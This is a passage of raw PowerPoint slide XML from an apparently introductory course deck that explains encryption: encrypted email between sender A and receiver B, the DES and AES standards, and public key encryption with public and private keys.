              <a:t> algorithm. An unauthorized user who access encoded data will have difficulty deciphering it, but authorized users are given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decoding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decrypting algorithms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r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keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>) to decipher data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18438" name="群組 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="550470" y="4987925"/>
            <a:ext cx="3546875" cy="1450975"/>
            <a:chOff x="2591172" y="4920524"/>
            <a:chExt cx="3548141" cy="1451881"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18450" name="文字方塊 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2591172" y="4925716"/>
              <a:ext cx="3784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b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18451" name="文字方塊 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5623146" y="4979498"/>
              <a:ext cx="3983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b="1" baseline="0" dirty="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18452" name="直線單箭頭接點 12"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3740005" y="5572185"/>
              <a:ext cx="1213302" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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 type="arrow" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18453" name="文字方塊 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3873355" y="4920524"/>
              <a:ext cx="9002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baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>Flow</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18454" name="文字方塊 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2723443" y="5919020"/>
              <a:ext cx="11860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Class S</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18455" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4953307" y="5972295"/>
              <a:ext cx="11860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Class U</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18456" name="文字方塊 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3899860" y="5541837"/>
              <a:ext cx="9028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baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>email</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18439" name="群組 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4818063" y="5332413"/>
            <a:ext cx="1114425" cy="1003300"/>
            <a:chOff x="5576935" y="5091008"/>
            <a:chExt cx="1113576" cy="947980"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18448" name="摺角紙張 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5576935" y="5091008"/>
              <a:ext cx="1113576" cy="947980"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667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18449" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5631253" y="5103001"/>
              <a:ext cx="941560" cy="675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 baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>X?%^*&amp;%)I,gS#!@ ...</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18440" name="矩形 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4486275" y="4792663"/>
            <a:ext cx="199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baseline="0" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Encrypted Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" baseline="0" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18441" name="群組 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7081838" y="5332413"/>
            <a:ext cx="1114425" cy="1003300"/>
            <a:chOff x="5576935" y="5091008"/>
            <a:chExt cx="1113576" cy="947980"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18446" name="摺角紙張 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5576935" y="5091008"/>
              <a:ext cx="1113576" cy="947980"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667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18447" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5576935" y="5103001"/>
              <a:ext cx="1113576" cy="610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b="1" baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>The account and password  are …</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18442" name="向右箭號 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6134100" y="5756275"/>
            <a:ext cx="763588" cy="155575"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50377"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0028A8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18443" name="文字方塊 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6037263" y="5395913"/>
            <a:ext cx="947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>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>decrypt</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18444" name="文字方塊 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6215063" y="5815013"/>
            <a:ext cx="55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baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18445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8313" y="5335588"/>
            <a:ext cx="720725" cy="735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72500" y="6386513"/>
            <a:ext cx="48577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5FD4604-6EC2-43C6-9302-1433C0898A98}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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38"/>
            <a:ext cx="8774112" cy="817562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="32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Data and Advanced Encryption Standards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692150"/>
            <a:ext cx="8885237" cy="5024438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Data Encryption Standard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b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>DES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a system developed by the U.S. government for use by the general public. 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widely accepted as a cryptographic standard worldwide.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provide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end-to-end encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>on the channel between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sender A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receiver B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ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>DES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> algorithm is a complex combination of two of the building blocks of encryption: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substitution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permutation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> (transposition).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Its strength comes from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repeated application of these two techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>for a total of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16 cycles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Plaintext (the original form of the message) is encrypted as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blocks of 64 bits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After questioning the adequacy of DES, the National Institute of Standards (NIST) introduced the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Advanced Encryption Standards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b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr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has 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block size of 128 bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>and thus takes longer time to crack.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5694363"/>
            <a:ext cx="5610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1984375" y="6276975"/>
            <a:ext cx="45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A</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" baseline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535" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4559300" y="6249988"/>
            <a:ext cx="452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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" baseline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369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01075" y="6386513"/>
            <a:ext cx="457200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F4BA749-C863-488C-AEA5-5C0C5B54C329}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600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2698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Public Key Encryption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977900"/>
            <a:ext cx="8774112" cy="3478213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In 1976 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Diffie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> and Hellman proposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>public key encryption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Public key algorithms are based on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mathematical functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>rather than operations on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bit patterns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Involve the use of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two separate keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>, in contrast to conventional encryption, which uses only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one key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The two keys used for public key encryption are referred to as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>public key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>private key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The public key is made for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public.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The private key is kept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secret by owner.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53958" y="4725988"/>
            <a:ext cx="7999939" cy="1592318"/>
            <a:chOff x="553958" y="4725988"/>
            <a:chExt cx="7999939" cy="1592318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23558" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2203450" y="5286375"/>
              <a:ext cx="452438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A</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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3559" name="文字方塊 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5468938" y="5314950"/>
              <a:ext cx="4524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B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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553958" y="4725988"/>
              <a:ext cx="7999939" cy="1592318"/>
              <a:chOff x="553958" y="4725988"/>
              <a:chExt cx="7999939" cy="1592318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="23557" name="群組 17"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="900113" y="4725988"/>
                <a:ext cx="7408862" cy="881062"/>
                <a:chOff x="900183" y="5781675"/>
                <a:chExt cx="7408792" cy="881064"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="23560" name="群組 19"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4079562" y="5883788"/>
                  <a:ext cx="1114425" cy="778951"/>
                  <a:chOff x="5576935" y="5091008"/>
                  <a:chExt cx="1113576" cy="947980"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23571" name="摺角紙張 17"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="5576935" y="5091008"/>
                    <a:ext cx="1113576" cy="947980"/>
                  </a:xfrm>
                  <a:prstGeom prst="foldedCorner">
                    <a:avLst>
                      <a:gd name="adj" fmla="val 16667"/>
                    </a:avLst>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="28575" algn="ctr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marL="609600" indent="-609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zh-TW" altLang="en-US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3572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1253" y="5103002"/>
                    <a:ext cx="941560" cy="6367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zh-TW" sz="1400" b="1" baseline="0">
                        <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                      </a:rPr>
                      <a:t>X?%^*&amp;%)I,gS#!@ ...</a:t>
                    </a:r>
                    <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" baseline="0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23561" name="群組 19"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="900183" y="5867400"/>
                  <a:ext cx="1114425" cy="719139"/>
                  <a:chOff x="5576935" y="5091008"/>
                  <a:chExt cx="1113576" cy="947980"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23569" name="摺角紙張 17"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="5576935" y="5091008"/>
                    <a:ext cx="1113576" cy="947980"/>
                  </a:xfrm>
                  <a:prstGeom prst="foldedCorner">
                    <a:avLst>
                      <a:gd name="adj" fmla="val 16667"/>
                    </a:avLst>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="28575" algn="ctr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marL="609600" indent="-609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zh-TW" altLang="en-US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3570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3664" y="5103001"/>
                    <a:ext cx="1059258" cy="8520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zh-TW" sz="1200" b="1" baseline="0" dirty="0">
                        <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                      </a:rPr>
                      <a:t>The resulting data has to  be cleaned …</a:t>
                    </a:r>
                    <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="0" dirty="0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23562" name="群組 19"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7194550" y="5881126"/>
                  <a:ext cx="1114425" cy="686363"/>
                  <a:chOff x="5576935" y="5091008"/>
                  <a:chExt cx="1113576" cy="947980"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23567" name="摺角紙張 17"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="5576935" y="5091008"/>
                    <a:ext cx="1113576" cy="947980"/>
                  </a:xfrm>
                  <a:prstGeom prst="foldedCorner">
                    <a:avLst>
                      <a:gd name="adj" fmla="val 16667"/>
                    </a:avLst>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="28575" algn="ctr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marL="609600" indent="-609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zh-TW" altLang="en-US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23568" name="文字方塊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3664" y="5103001"/>
                    <a:ext cx="1059258" cy="8926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00"/>
                      </a:buClr>
                      <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                      <a:defRPr sz="3200" baseline="-2500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r>
                      <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" baseline="0">
                        <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                      </a:rPr>
                      <a:t>The resulting data has to  be cleaned …</a:t>
                    </a:r>
                    <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="0">
                      <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="23563" name="直線單箭頭接點 13"/>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks noChangeShapeType="1"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2105025" y="6364288"/>
                  <a:ext cx="1843158" cy="1588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3564" name="矩形 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1986023" y="5781675"/>
                  <a:ext cx="2038331" cy="584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600" baseline="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encryption algorithm + </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0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B’s</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="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 </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0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public key  </a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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3565" name="矩形 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5181630" y="5815013"/>
                  <a:ext cx="2038331" cy="584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600" baseline="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decryption algorithm + </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0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B’s private key  </a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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23566" name="直線單箭頭接點 16"/>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks noChangeShapeType="1"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5260662" y="6394451"/>
                  <a:ext cx="1843158" cy="1588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" name="矩形 1"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6997894" y="5521297"/>
                <a:ext cx="1556003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B’s</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1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public key</a:t>
                </a:r>
              </a:p>
              <a:p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B’s</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1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private key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3958" y="5616575"/>
                <a:ext cx="1555041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A’s</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1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public key</a:t>
                </a:r>
              </a:p>
              <a:p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A’s</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1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</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" baseline="0" dirty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private key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836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02CE61-688B-44DC-99B9-3A999194BBB6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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36513"/>
            <a:ext cx="8774112" cy="706437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Ingredients of Public Key Encryption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866775"/>
            <a:ext cx="8774112" cy="4086225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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b="1" i="1" dirty="0">
